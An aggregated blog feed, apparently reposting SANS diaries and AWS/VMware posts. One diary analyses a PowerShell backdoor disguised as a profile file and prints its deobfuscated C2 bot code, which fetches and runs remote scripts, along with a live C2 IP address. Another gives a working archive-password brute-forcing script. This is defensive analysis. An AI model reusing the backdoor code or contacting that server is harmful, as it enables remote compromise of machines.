All posts by David

Undetected PowerShell Backdoor Disguised as a Profile File, (Fri, Jun 9th)

This post was originally published on this site

PowerShell remains an excellent way to compromise computers. Most PowerShell scripts found in the wild are obfuscated; most of the time, this helps reduce the number of antivirus vendors that detect the script. Yesterday, I found a script that scored 0/59 on VT! Let's have a look at it.

The file was found with the name "Microsoft.PowerShell_profile.ps1". The attacker selected this name cleverly because it is a well-known name used by Microsoft to manage PowerShell profiles[1]. You may compare this to ".bashrc" on Linux: it's a way to customize your environment. Every time you launch PowerShell, it looks in several locations, and if a profile file is found, it is executed. Note that this is also an excellent way to implement persistence because the malicious code will be re-executed every time a new PowerShell session is launched. It's listed as T1546.013[2] in the MITRE ATT&CK framework.
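
As a side note, you can quickly check which profile files your own PowerShell session evaluates, and whether any of them already exist. This is a minimal sketch using the built-in $PROFILE variable:

# List the four profile locations PowerShell evaluates at startup and flag
# those that already contain a file. Any existing profile script is executed
# automatically in every new session, which is exactly what T1546.013 abuses.
$PROFILE | Get-Member -MemberType NoteProperty | ForEach-Object {
    $path = $PROFILE.($_.Name)
    [PSCustomObject]@{
        Scope  = $_.Name
        Path   = $path
        Exists = Test-Path -Path $path
    }
}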

Let’s reverse the script (SHA256: a3d265a0ab00466aab978d0ccf94bb48808861b528603bddead6649eea7c0d16). When opened in a text editor, we can see that it is heavily obfuscated:

$mkey = "hxlksmxfcmspgnhf";
$srv = "AAwYG0lCV1daXV1BU0BbUUZKWF5JVUhWUw==";
$cmp = "CggGEgkeExAGCRwKCQ0aEQ==";

$bSDvRdgFlcnAwxj = @(24,'r','','IHwgb3V0LW51bGwKJHBzLkFkZEFyZ3V','',21,'d',([int](("94UmlEWn459UmlEWn686UmlEWn786UmlEWn10UmlEWn22UmlEWn633UmlEWn666UmlEWn701UmlEWn553" -split "UmlEWn")[5])),([int](("650Wmugo21Wmugo835Wmugo417Wmugo906Wmugo812Wmugo286Wmugo749Wmugo960Wmugo29" -split "Wmugo")[9])),([int](("419Gm370Gm388Gm238Gm2Gm902Gm197Gm582Gm305Gm133" -split "Gm")[4])),([string](("pTOikLyVWRMBZLkLyqgzIlWkLyLQOKkLyDjwiHkLyDQtofyikLyoKkLynbKDLukLyYBtQkLyTFkmtvQbI" -split "kLy")[6])),([string](("ulxwNSBGgYFDhZCbGgYFDhZLMQxkZGgYFDhZoafQGZyGgYFDhZwjysVfDOGgYFDhZcWPBAJfZRGgYFDhZHpzWCeiGgYFDhZSxpjbwIsGgYFDhZCFsGgYFDhZg" -split "GgYFDhZ")[([int](("9kdIhpwlnjWt689kdIhpwlnjWt878kdIhpwlnjWt775kdIhpwlnjWt965kdIhpwlnjWt828kdIhpwlnjWt529kdIhpwlnjWt957kdIhpwlnjWt917kdIhpwlnjWt224" -split "kdIhpwlnjWt")[0]))])),46,'tV','Ut',33,'VudFN0YXRlID0gIlNUQSIKJHJz',([int](("41rVCGBZ17rVCGBZ230rVCGBZ879rVCGBZ163rVCGBZ152rVCGBZ7rVCGBZ190rVCGBZ91rVCGBZ800" -split "rVCGBZ")[0])),27,([string](("vRUuwlkhDgkhjBTkhCYbTUGxkhskkhrefJkhmPESOhykhoWkhn.AmsikhmQkLRonvi" -split "kh")

Note the presence of the three variables at the top of the file.

The obfuscation technique is pretty good: arrays of interesting strings are created but split using random delimiter strings. The last line of the script is very long and is passed to an Invoke-Expression. To speed up the analysis, you can replace the IEX with a simple echo to print the deobfuscated code:

[Scriptblock]$script = {
    param($mkey, $srv, $cmp)
    function ConvertFrom-JSON20([object] $item){
        ...
        return ,$ps_js.DeserializeObject($item);
    }

    function xor($data, $key){
        ...
        return $xordData
    }

    function Main{
        $enc = [System.Text.Encoding]::UTF8
        $srv = [System.Convert]::FromBase64String($srv)
        $srv = xor $srv $mkey
        $srv = $enc.getString($srv)
        $cmp = [System.Convert]::FromBase64String($cmp)
        $cmp = xor $cmp $mkey
        $cmp = $enc.getString($cmp)
        $enc = [System.Text.Encoding]::UTF8
        $UUID = (get-wmiobject Win32_ComputerSystemProduct).uuid;
        $xorkey = $enc.GetBytes($cmp)
        $data = xor $enc.GetBytes($UUID) $xorkey;
        $web = New-Object System.Net.WebClient;
        while($true){
            try{
                $res = $web.UploadData("$srv/$cmp", $data);break
            }catch{
                if($_.exception -match '(404)'){exit}
            }
            Start-Sleep -s 60;
        }
        $res = xor $res $cmp
        $res = $enc.GetString($res);
        $res = ConvertFrom-JSON20($res);
        $script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($res.script));
        $script = [Scriptblock]::Create($script);
        Invoke-Command -ScriptBlock $script -ArgumentList $res.args;
     }
     Main
}

$rs = [runspacefactory]::CreateRunspace()
$rs.ApartmentState = "STA"
$rs.ThreadOptions = "ReuseThread"          
$rs.Open()
$rs.SessionStateProxy.SetVariable("h",$host)
$ps = [PowerShell]::Create()
$ps.Runspace = $rs
$ps.AddScript($script) | out-null
$ps.AddArgument($mkey) | out-null
$ps.AddArgument($srv) | out-null
$ps.AddArgument($cmp) | out-null
$res = $ps.BeginInvoke()
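
For reference, the "replace IEX with echo" trick mentioned above can be as simple as the following sketch (file names are hypothetical; do this only in an isolated analysis VM, since the obfuscation layer itself still executes):

# Patch the obfuscated profile so the final stage is printed instead of run:
# swap the IEX alias (or the full cmdlet name) for Write-Output, then execute
# the patched copy and capture the decoded stage.
$raw = Get-Content -Raw .\Microsoft.PowerShell_profile.ps1
$raw -replace '\b(iex|invoke-expression)\b', 'Write-Output' | Set-Content .\patched.ps1
powershell.exe -NoProfile -ExecutionPolicy Bypass -File .\patched.ps1 > decoded.ps1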

The script creates a script-block and executes it in a runspace[3]. The script tries to contact a C2 server and submits the system UUID, probably to create the "bot" on the C2 side. The C2 address is derived from the three parameters defined at the top of the script.
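
This derivation is easy to reproduce outside the malware. The following minimal sketch re-implements the Base64-plus-XOR decoding of $srv; it prints the C2 URL, and decoding $cmp the same way yields "bpjyzskvedozncrw", which reappears below:

# Reproduce the malware's decoding: Base64-decode the blob, then XOR it with
# the repeating key $mkey (the same logic as its xor() helper).
$mkey = "hxlksmxfcmspgnhf"
$srv  = "AAwYG0lCV1daXV1BU0BbUUZKWF5JVUhWUw=="
$key  = [System.Text.Encoding]::UTF8.GetBytes($mkey)
$data = [System.Convert]::FromBase64String($srv)
$dec  = for ($i = 0; $i -lt $data.Length; $i++) { $data[$i] -bxor $key[$i % $key.Length] }
[System.Text.Encoding]::UTF8.GetString([byte[]]$dec)   # prints http://190.14.37.245:8000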

The C2 returns JSON data that contains interesting material:

{
    "script": "...", 
    "args": [
        "http://190.14.37.245:8000", 
        "bpjyzskvedozncrw",
        "<RSAKeyValue>...</RSAKeyValue>",
        "<RSAKeyValue>...</RSAKeyValue>", 
        15
        ]
}

A second script is returned (Base64-encoded) with the same C2 address (I presume it could be another one) and some encryption-related material. What's the purpose of "bpjyzskvedozncrw"? It's the campaign ID, as described in the next-stage script:

param(
    [string]$server_url, 
    [string]$campaign_id, 
    [string]$RSAPanelPubKey, 
    [string]$RSABotPrivateKey, 
    [int]$polling_interval
)

function ConvertTo-JSON20 {
    ...
}

function ConvertFrom-JSON20([object] $item){
    ...
}

function Is-VM {
    ...
}

function Encrypt-Data{
    ...
}

function Decrypt-Data{
    ...
}

function Get-SystemInfo {
    ...
}

function Start-RunspaceDisposer($jobs){
    ...
}

function Add-Log{
    ...
}

function Run-Module{
    ...
}

function main{
    $UUID = (get-wmiobject Win32_ComputerSystemProduct).uuid;
    $mtx = New-Object System.Threading.Mutex($false, $uuid);
    $mtx.WaitOne()
    $jobs = [system.collections.arraylist]::Synchronized((New-Object System.Collections.ArrayList))
    Start-RunspaceDisposer $jobs
    $runningtasks = [hashtable]::Synchronized(@{})
    $logs = [system.collections.arraylist]::Synchronized((New-Object System.Collections.ArrayList))
    while($true){
        try{
            $web = New-Object Net.WebClient;
            $random_path = -join ((97..122) | Get-Random -Count 24 | % {[char]$_});
            $data = @{UUID = $UUID; campaign_id = $campaign_id};
            $data = $data | ConvertTo-JSON20;
            $data = Encrypt-Data -data $data;
            $res = $web.UploadData("$server_url/$random_path", $data);
            if(!$res){
                $systeminfo = Get-SystemInfo;
                $data = @{UUID = $UUID; systeminfo = $systeminfo; campaign_id = $campaign_id};
                $data = $data | ConvertTo-JSON20;
                $data = Encrypt-Data -data $data;
                $web.UploadData("$server_url/$random_path", $data);
                Start-Sleep -s 3;
                continue;
            }
            $res = Decrypt-Data -data $res;
            $res = [System.Text.Encoding]::UTF8.GetString($res).Trim([char]0);
            $res = ConvertFrom-JSON20($res);
            $url_id = $res.url_id;
            while($true){
                $url = "$server_url/$url_id";
                $task = $web.DownloadData($url);
                $task = Decrypt-Data -data $task;
                $task = [System.Text.Encoding]::UTF8.GetString($task).Trim([char]0);
                $task = ConvertFrom-JSON20($task);

                if($task.task_id -and $task.scriptname){
                    $task_id = $task.task_id
                    $scriptname = $task.scriptname
                    try{
                        if(!($task.scriptname -eq 'hbr' -and $task.type -eq 'run')){
                            $task_report = @{UUID = $UUID; task_id = $task_id; status = 'running'};
                            $task_report = $task_report | ConvertTo-JSON20;
                            $task_report = Encrypt-Data -data $task_report;
                            $random_path = -join ((97..122) | Get-Random -Count 24 | % {[char]$_});    
                            $web.UploadData("$server_url/$random_path", $task_report);
                        }
                    }catch{
                        #write-host $_.exception
                    }
                
                    if($task.type -eq 'run'){
                        $script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($task.script));
                        $scriptblock = [Scriptblock]::Create($script);
                        if($task.background){
                            $runningtasks.$scriptname = @{'exit'=$false}
                            Run-Module $scriptblock $task.args $jobs $runningtasks $logs $task_id $scriptname
                        }

                        else{
                            Run-Module $scriptblock $task.args $jobs $null $logs $task_id $scriptname
                            if($scriptname -eq 'remove'){start-sleep -s 30; exit}
                        }
                    }
                    elseif($task.type -eq 'kill'){
                        if($runningtasks.ContainsKey($scriptname)){
                            $runningtasks.$scriptname.exit = $true
                            $runningtasks.remove($scriptname)    
                        }

                        try{
                            $task_report = @{UUID = $UUID; task_id = $task_id; status = 'completed'};
                            $task_report = $task_report | ConvertTo-JSON20;
                            $task_report = Encrypt-Data -data $task_report;
                            $random_path = -join ((97..122) | Get-Random -Count 24 | % {[char]$_});    
                            $web.UploadData("$server_url/$random_path", $task_report);
                        }catch{
                            #write-host $_.exception
                        }
                    }
                }

                $logsToProcess = @()
                while($logs.count -gt 0){
                    $logsToProcess += $logs[0]
                    $logs.RemoveAt(0)
                }

                if($task.debug -and $logsToProcess.Count -gt 0){
                    try{
                        $data = @{'logs'=$logsToProcess; 'uuid'=$UUID}
                        $data = $data | ConvertTo-JSON20
                        $data = Encrypt-Data -data $data;
                        $random_path = -join ((97..122) | Get-Random -Count 24 | % {[char]$_});
                        $web.UploadData("$server_url/$random_path", $data) | Out-Null;
                    }catch{
                        #write-host $_.exception
                    }
                }

                $url_id = $task.url_id;
                
                [System.GC]::Collect();
                Start-Sleep -s $task.polling_interval;
            }
        }
        catch{
            [System.GC]::Collect();
            Start-Sleep -s $polling_interval;
        }
        
    }
    $mtx.ReleaseMutex();
    $mtx.Dispose();
}

main

The script uses the same technique and runs its code inside another runspace. It enters an infinite loop, waiting for commands from the C2 server.
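
One small detail worth highlighting: main() reuses the machine UUID as a named mutex so that only one bot instance runs per host. The pattern looks roughly like this (a simplified sketch; the malware blocks on WaitOne() instead of probing):

# Single-instance guard: the machine UUID doubles as a system-wide mutex
# name, so a second copy of the script detects the first one and exits.
$uuid = (Get-WmiObject Win32_ComputerSystemProduct).UUID
$mtx  = New-Object System.Threading.Mutex($false, $uuid)
if (-not $mtx.WaitOne(0)) {      # non-blocking probe, for illustration only
    Write-Output "Another instance already holds the mutex."
    exit
}
try {
    # ... the C2 polling loop would run here ...
}
finally {
    $mtx.ReleaseMutex()
    $mtx.Dispose()
}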

While writing this diary, the C2 server (190.14.37.245) is still alive. I started a honeypot to capture all details of a potential attempt to use my system. I'm now waiting for some activity…

[1] https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.3
[2] https://attack.mitre.org/techniques/T1546/013/
[3] https://devblogs.microsoft.com/scripting/beginning-use-of-powershell-runspaces-part-1/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS Week in Review – Amazon Security Lake Now GA, New Actions on AWS Fault Injection Simulator, and More – June 5, 2023

This post was originally published on this site

Last Wednesday, I traveled to Cape Town to speak at the .NET Developer User Group. My colleague Francois Bouteruche also gave a talk but joined virtually. I enjoyed my time there; what an amazing community! Join the group to learn about upcoming events.

Now on to the AWS updates from last week. There was a lot of news related to AWS, and I have compiled a few announcements you need to know about. Let's get started!

Last Week’s Launches
Here are a few launches from last week that you might have missed:

Amazon Security Lake is now Generally Available – This service automatically centralizes security data from AWS environments, SaaS providers, on-premises environments, and cloud sources into a purpose-built data lake stored in your account. This makes it easier to analyze security data, gain a more comprehensive understanding of security across your entire organization, and improve the protection of your workloads, applications, and data. Read more in Channy's post announcing the preview of Security Lake.

New AWS Direct Connect Location in Santiago, Chile – The AWS Direct Connect service lets you create a dedicated network connection to AWS. With this service, you can build hybrid networks by linking your AWS and on-premises networks to build applications that span environments without compromising performance. Last week we announced the opening of a new AWS Direct Connect location in Santiago, Chile. This new Santiago location offers dedicated 1 Gbps and 10 Gbps connections, with MACsec encryption available for 10 Gbps. For more information on over 115 Direct Connect locations worldwide, visit the locations section of the Direct Connect product detail pages.

New actions on AWS Fault Injection Simulator for Amazon EKS and Amazon ECS – Had it not been for Adrian Hornsby's LinkedIn post, I would have missed this announcement. We announced the expanded support of AWS Fault Injection Simulator (FIS) for Amazon Elastic Kubernetes Service (EKS) and Amazon Elastic Container Service (ECS). This expanded support adds additional AWS FIS actions for Amazon EKS and Amazon ECS. Learn more about Amazon ECS task actions here, and Amazon EKS pod actions here.

Other AWS News
A few more news items and blog posts you might have missed:

Autodesk Uses SageMaker to Improve Observability – One of our customers, Autodesk, used AWS services including Amazon SageMaker, Amazon Kinesis, and Amazon API Gateway to build a platform that enables development and deployment of near-real-time personalization experiments by modeling and responding to user behavior data. All this delivered a dynamic, personalized experience for Autodesk's customers. Read more about the story at AWS Customer Stories.

AWS DMS Serverless – We announced AWS DMS Serverless which lets you automatically provision and scale capacity for migration and data replication. Donnie wrote about this announcement here.

For AWS open-source news and updates, check out the latest newsletter curated by my colleague Ricardo Sueiras to bring you the most recent updates on open-source projects, posts, events, and more.

For a full list of AWS announcements, be sure to keep an eye on the What’s New at AWS page.

Upcoming AWS Events
We have the following upcoming events. These give you the opportunity to meet with other tech enthusiasts and learn:

AWS Silicon Innovation Day (June 21) – A one-day virtual event that will allow you to understand AWS Silicon and how you can use AWS’s unique silicon offerings to innovate. Learn more and register here.

AWS Global Summits – Sign up for the AWS Summit closest to where you live: London (June 7), Washington, DC (June 7–8), Toronto (June 14).

AWS Community Days – Join these community-led conferences where event logistics and content are planned, sourced, and delivered by community leaders: Chicago, Illinois (June 15), and Chile (July 1).

And with that, I end my very first Week in Review post; it was such fun to write. Come back next Monday for another Week in Review!

Veliswa x

This post is part of our Week in Review series. Check back each week for a quick roundup of interesting news and announcements from AWS!

Brute Forcing Simple Archive Passwords, (Mon, Jun 5th)

This post was originally published on this site

[Guest diary submitted by Gebhard]

Occasionally, malicious files are distributed by email in a password-protected attachment to prevent email security gateways from analyzing the included files. The password can normally be found in the email itself and is pretty simple: it should only hinder analysis, not stop the lazy (but curious) user from opening the attachment.

But what if the email containing the password is lost? For example, the encrypted attachment could have been saved to disk some time ago (not detected as malicious at that time) but be detected afterward, e.g., by a full scan or new IoCs. So now you have an encrypted archive file, and you're pretty damn sure it's malicious (e.g., VT tells you so but doesn't provide any details).

Because the bad guys don't want to overburden the user, the password is short (3-4 characters) and only contains letters and numbers. So this is a rare case where it can make sense to just brute-force the password of the archive in a reasonable time.
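
To put numbers on this: with a 62-character set (a-z, A-Z, 0-9), lengths 3 to 4 give 62^3 + 62^4 = 15,014,664 candidates, and even the full length 3-6 space used by the script below is 62^3 + 62^4 + 62^5 + 62^6 = 57,731,383,080 candidates, which is exactly the number crunch reports in the sample output further down.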

I've looked around but haven't found any tool which can be used out of the box. So I used some ideas ([1], [2]) and created a script that should run on Kali 2023 out of the box:

#!/bin/bash

VERSION="v0.2"

# based on: 

# - https://synacl.wordpress.com/2012/08/18/decrypting-a-zip-using-john-the-ripper/
# - https://gist.github.com/bcoles/421cc413d07cd9ba7855
# modified for bruteforcing 

# use for malicious file attachments with short passwords
# tested on kali 2023
# 2023-05-27 v0.1 gebhard
# 2023-05-28 v0.2 gebhard
# Todos:
# - make password method configurable
# - speed up / distribute brute forcing

LINE="#############################################################################"

echo "Archive Password Bruteforce Script ${VERSION}"
echo "---------------------------------------"

# check parameters
if [ $# -lt 1 ]; then
   echo "Usage $0 <archive-file> [<min-length:3> <max-length:6>]"
   exit 1
fi

ZIP=${1}

# crunch configuration
# default values for password length: min=3, max=6
MINLENGTH=${2-3}
MAXLENGTH=${3-6}
# crunch charset config
CHARFILE="/usr/share/crunch/charset.lst"
CHARSET="mixalpha-numeric"

if [ ! -r ${ZIP} ] ; then
   echo "Archive file \"${ZIP}\" not found."
   exit 2
fi
if [ ! -r ${CHARFILE} ] ; then
   echo "Charset file \"${CHARFILE}\" not found."
   exit 2
fi

echo "Parameters"
echo "----------"
echo "File      : ${ZIP}"
echo "Min-Length: ${MINLENGTH}"
echo "Max-Length: ${MAXLENGTH}"
echo "Charfile  : ${CHARFILE}"
echo "Charset   : ${CHARSET}"
echo ${LINE}

# counter for sign of life
COUNT=0
# every xxx guesses: display sign of life
SOL=1000
# counter for total guesses
GUESS=0

echo "Archive content"
echo "---------------"
7z l ${ZIP}

# check if 7z found the file to be OK
if [ ${?} -ne 0 ] ; then
   echo ${LINE}
   echo "7z reported an error. Archive file corrupt?"
   exit 3
fi

echo ${LINE}
echo "Continue: ENTER, Abort: <CTRL+C>"
read lala

echo ${LINE}

echo "Start: `date`"

# note: stdout of crunch is passed to a subshell, so passing variables back is not that easy
crunch ${MINLENGTH} ${MAXLENGTH} -f ${CHARFILE} ${CHARSET} |
   while IFS= read -r PASS
   do
      # count total guesses
      ((GUESS=GUESS+1))
      # every $SOL passwords: display a sign of life
      ((COUNT=COUNT+1))
      if [ ${COUNT} -eq ${SOL} -o ${COUNT} -eq 0 ] ; then
         COUNT=0
         echo -ne "\rCurrent password (guess: ${GUESS}): \"${PASS}\" "
      fi
      # try to extract
      7z t -p${PASS} ${ZIP} >/dev/null 2>&1 

      # check exit code of 7z
      if [ ${?} -eq 0 ]; then
         # 7z returns 0, so password has been found 

         echo ""
         echo ${LINE}
         echo "Script finished (${GUESS} guesses)."
         echo "Archive password is: "${PASS}""
         echo "End: `date`"
         # return from subshell with exit status 99 so that main process knows pwd has been found
         exit 99
      fi
   done

# if exit code from subshell is not 99 then pwd has not been found
if [ ${?} -ne 99 ] ; then
   echo ""
   echo ${LINE}
   echo "Script finished. No password found."
   echo "End: `date`"
   exit 1
fi

exit 0

I used a slightly earlier version of the script, and it was able to get the password for this example
https://www.virustotal.com/gui/file/dc374b6eeae0a555796f2a6811997fda6e1a6b293a2c63e1c7254ac61c990c5b
in about 12 hours on a reasonably fast VM using 12,131,410 attempts. 

Here's the output:
┌──(kali㉿kali)-[~/analysis/]
└─$ ./pw-brute.sh file.zip

ZIP Password Bruteforce Script
------------------------------
Parameters
----------
File: file.zip
Min-Length: 3
Max-Length: 6
Charfile:   /usr/share/crunch/charset.lst
Charset:    mixalpha-numeric
#############################################################################
Archive content
---------------

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,128 CPUs Intel(R) Xeon(R) E-2104G CPU @ 3.20GHz (906EA),ASM,AES-NI)

Scanning the drive for archives:
1 file, 648326 bytes (634 KiB)

Listing archive: file.zip

--
Path = file.zip
Type = zip
Physical Size = 648326

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2022-10-10 08:27:19 ....A      1525760       648148  New_documents#3893.iso
------------------- ----- ------------ ------------  ------------------------
2022-10-10 08:27:19            1525760       648148  1 files
#############################################################################
Continue: ENTER, Abort: <CTRL+C>

#############################################################################
Start: Sat May 27 04:02:00 PM EDT 2023
Crunch will now generate the following amount of data: 403173281072 bytes
384496 MB
375 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 57731383080 

Current password (guess: 12131000): "X3Zr" 

##########################################################################
Script finished (12131410 guesses).
Archive password is: "X353"
End: Sun May 28 04:37:39 AM EDT 2023

The script is pretty basic:
– get the archive file name and, optionally, the min and max password lengths from the user
– do a basic check on the archive (make sure 7z can access the content)
– use "crunch" to loop through a list of mixed alphanumeric passwords within the length bounds
– for every password: try to test the archive extraction (without actually writing the files to disk)
– if the password is found: exit the loop

Handling the password-found vs. password-not-found case has to work even though the actual check runs in a subshell (the while loop reads from a pipe). So an exit code signals to the main process whether the password was found (99) or not.

If this was helpful, feel free to leave a comment with details.


This guest diary was submitted by Gebhard.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Top 10 Most Popular Knowledge Articles for Horizon, WorkspaceONE, End User Computing (EUC), Personal Desktop for May, 2023   

This post was originally published on this site

Get answers and solutions instantly by using VMware's Knowledge Base (KB) articles to solve known issues. Whether you're looking to improve your productivity, troubleshoot common issues, or simply learn something new, these most used and most viewed knowledge articles are a great place to start. Here are the top 5 most viewed KB articles …

The post Top 10 Most Popular Knowledge Articles for Horizon, WorkspaceONE, End User Computing (EUC), Personal Desktop for May, 2023 appeared first on VMware Support Insider.

New – AWS DMS Serverless: Automatically Provisions and Scales Capacity for Migration and Data Replication

This post was originally published on this site

With the vast amount of data being created today, organizations are moving to the cloud to take advantage of the security, reliability, and performance of fully managed database services. To facilitate database and analytics migrations, you can use AWS Database Migration Service (AWS DMS). First launched in 2016, AWS DMS offers a simple migration process that automates database migration projects, saving time, resources, and money.

Although you can start an AWS DMS migration with a few clicks through the console, you still need to do research and planning to determine the required capacity before migrating. It can be challenging to know how to properly scale capacity ahead of time, especially when simultaneously migrating many workloads or continuously replicating data. On top of that, you also need to continually monitor usage and manually scale capacity to ensure optimal performance.

Introducing AWS DMS Serverless
Today, I’m excited to tell you about AWS DMS Serverless, a new serverless option in AWS DMS that automatically sets up, scales, and manages migration resources to make your database migrations easier and more cost-effective.

Here’s a quick preview of how AWS DMS Serverless works:

AWS DMS Serverless removes the guesswork of figuring out required compute resources and handling the operational burden needed to ensure a high-performance, uninterrupted migration. It performs automatic capacity provisioning, scaling, and capacity optimization of migrations, allowing you to quickly begin migrations with minimal oversight.

At launch, AWS DMS Serverless supports Microsoft SQL Server, PostgreSQL, MySQL, and Oracle as data sources. As for data targets, AWS DMS Serverless supports a wide range of databases and analytics services, including Amazon Aurora, Amazon Relational Database Service (Amazon RDS), Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon DynamoDB, and more. AWS DMS Serverless continues to add support for new data sources and targets. Visit Supported Engine Versions to stay updated.

With a variety of sources and targets supported by AWS DMS Serverless, many scenarios become possible. You can use AWS DMS Serverless to migrate databases and help to build modern data strategies by synchronizing ongoing data replications into data lakes (e.g., Amazon S3) or data warehouses (e.g., Amazon Redshift) from multiple, perhaps disparate data sources.

How AWS DMS Serverless Works
Let me show you how you can get started with AWS DMS Serverless. In this post, I migrate my data from a source database running on PostgreSQL to a target MySQL database running on Amazon RDS. The following screenshot shows my source database with dummy data:

As for the target, I’ve set up a MySQL database running in Amazon RDS. The following screenshot shows my target database:

Getting started with AWS DMS Serverless is similar to how AWS DMS works today. AWS DMS Serverless requires me to complete setup tasks such as creating a virtual private cloud (VPC) and defining source and target endpoints. If this is your first time working with AWS DMS, you can learn more by visiting Prerequisites for AWS Database Migration Service.

To connect to a data store, AWS DMS needs endpoints for both the source and target data stores. An endpoint provides all necessary information, including the connection details, data store type, and location of my data stores. The following image shows an endpoint I’ve created for my target database:

When I have finished setting up the endpoints, I can begin to create a replication by selecting the Create replication button on the Serverless replications page. Replication is a new concept introduced in AWS DMS Serverless to abstract instances and tasks that we normally have in standard AWS DMS. Additionally, the capacity resources are managed independently for each replication.

On the Create replication page, I need to define some configurations. This starts with defining Name, then specifying Source database endpoint and Target database endpoint. If you don’t find your endpoints, make sure you’re selecting database engines supported by AWS DMS Serverless.

After that, I need to specify the Replication type. There are three types of replication available in AWS DMS Serverless:

  • Full load — If I need to migrate all existing data in the source database.
  • Change data capture (CDC) — If I need to replicate only data changes from the source to the target database.
  • Full load and change data capture (CDC) — If I need to migrate existing data and replicate data changes from the source to the target database.

In this example, I chose Full load and change data capture (CDC) because I need to migrate existing data and continuously update the target database for ongoing changes on the source database.

In the Settings section, I can also enable logging with Amazon CloudWatch, which makes it easier for me to monitor replication progress over time.

As with standard AWS DMS, in AWS DMS Serverless I can also configure Selection rules in Table mappings to define the filters that select what to replicate from the tables in the source data store.

I can also use Transformation rules if I need to rename a schema or table or add a prefix or suffix to a schema or table.

In the Capacity section, I can set the range of capacity required to perform the replication by defining the minimum and maximum DCU (DMS capacity units). The minimum DCU setting is optional because AWS DMS Serverless determines the minimum DCU based on an assessment of the replication workload. During the replication process, AWS DMS uses this range to scale up and down based on CPU utilization, connections, and available memory.

Setting the maximum capacity allows you to manage costs by making sure that AWS DMS Serverless never consumes more resources than you have budgeted for. When you define the maximum DCU, make sure that you choose a reasonable capacity so that AWS DMS Serverless can handle large bursts of data transaction volumes. If traffic volume decreases, AWS DMS Serverless scales capacity down again, and you only pay for what you need. For cases in which you want to change the minimum and maximum DCU settings, you have to stop the replication process first, make the changes, and run the replication again.
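
For readers who prefer scripting the same steps, here is a hypothetical sketch (run from PowerShell with the AWS CLI; all ARNs, names, and the mappings file are placeholders, and it assumes the CLI exposes the new CreateReplicationConfig operation):

# Hypothetical: create a serverless replication with a DCU capacity range.
aws dms create-replication-config `
    --replication-config-identifier "pg-to-mysql-demo" `
    --source-endpoint-arn "arn:aws:dms:us-east-1:123456789012:endpoint:SRC" `
    --target-endpoint-arn "arn:aws:dms:us-east-1:123456789012:endpoint:TGT" `
    --replication-type "full-load-and-cdc" `
    --compute-config "MinCapacityUnits=1,MaxCapacityUnits=16" `
    --table-mappings file://mappings.json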

When I’m finished with configuring replication, I select Create replication.

When my replication is created, I can view more details of my replication and start the process by selecting Start.

After my replication runs for around 40 minutes, I can monitor its progress in the Monitoring tab. AWS DMS Serverless also has a CloudWatch metric called Capacity utilization, which indicates the capacity used to run the replication within the range defined by the minimum and maximum DCU. The following screenshot shows the capacity scaling up in the CloudWatch metrics chart.

When the replication finishes its process, I see the capacity starting to decrease. This indicates that in addition to AWS DMS Serverless successfully scaling up to the required capacity, it can also scale down within the range I have defined.

Finally, all I need to do is verify whether my data has been successfully replicated into the target data store. I need to connect to the target, run a select query, and check if all data has been successfully replicated from the source.

Now Available
AWS DMS Serverless is now available in all commercial regions where standard AWS DMS is available, and you can start using it today. For more information about benefits, use cases, how to get started, and pricing details, refer to AWS DMS Serverless.

Happy migrating!
Donnie

Top 10 Most Popular Knowledge Articles for HCX, SaaS, EPG Emerging Products Group for May, 2023   

This post was originally published on this site

Get answers and solutions instantly by using VMware's Knowledge Base (KB) articles to solve known issues. Whether you're looking to improve your productivity, troubleshoot common issues, or simply learn something new, these most used and most viewed knowledge articles are a great place to start. Here are the top 5 most viewed KB articles …

The post Top 10 Most Popular Knowledge Articles for HCX, SaaS, EPG Emerging Products Group for May, 2023 appeared first on VMware Support Insider.

After 28 years, SSLv2 is still not gone from the internet… but we're getting there, (Thu, Jun 1st)

This post was originally published on this site

Although the SSL/TLS suite of protocols has been instrumental in making secure communication over computer networks into the (relatively) straightforward affair it is today, the beginnings of these protocols were far from ideal.

The first publicly released version of the Secure Sockets Layer protocol, SSL version 2.0, was published all the way back in 1995 and was quickly discovered to contain a number of security flaws. This led to the development of a more secure version of the protocol named SSLv3, which was officially published only a year later (and which, as it later turned out, had its own set of issues). It also led to the official deprecation of SSLv2 in 2011[1].

Although, due to its deprecated status, most web browsers have been unable to use SSLv2 for over a decade, support for this protocol still lingers. A few years ago, one might still have found it even on web servers one would hope would be as secure as possible – for example, on servers providing access to internet banking services[2].

Nevertheless, while going over data about open ports and protocol support on the internet, which I have gathered over time from Shodan using my TriOp tool, I recently noticed that although there is still a not insignificant number of web servers that support SSLv2, the overall trend shows that such systems are slowly “dying off”.

According to Shodan, two years ago over 1.43% of all web servers supported SSLv2; currently, it is only about 0.35%.

This data seems to be supported by the latest statistics from Qualys SSL Labs[3], which show that the service detected SSLv2 support on only 0.2% of all servers it scanned in the course of April 2023.

Since common web browsers can’t even use SSLv2 these days, its continued support may not be too problematic on its own. Nevertheless, the fact that a certain web server supports this anachronistic protocol is an interesting indicator that other vulnerabilities and security issues may (and most likely will) be present on the same system.
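
If you want to verify a server you are responsible for, a quick probe can be sketched in PowerShell (a hypothetical example; example.com is a placeholder, and modern .NET/SChannel builds typically cannot negotiate SSLv2 at all anymore, so the handshake may fail on the client side regardless of the server):

# Attempt an SSLv2-only handshake. On platforms where SSLv2 support has been
# removed from the TLS stack, AuthenticateAsClient throws straight away.
$client = New-Object System.Net.Sockets.TcpClient('example.com', 443)   # placeholder host
$cb  = { param($s, $cert, $chain, $errors) $true } -as [System.Net.Security.RemoteCertificateValidationCallback]
$ssl = New-Object System.Net.Security.SslStream($client.GetStream(), $false, $cb)
try {
    $ssl.AuthenticateAsClient('example.com', $null,
        [System.Security.Authentication.SslProtocols]::Ssl2, $false)
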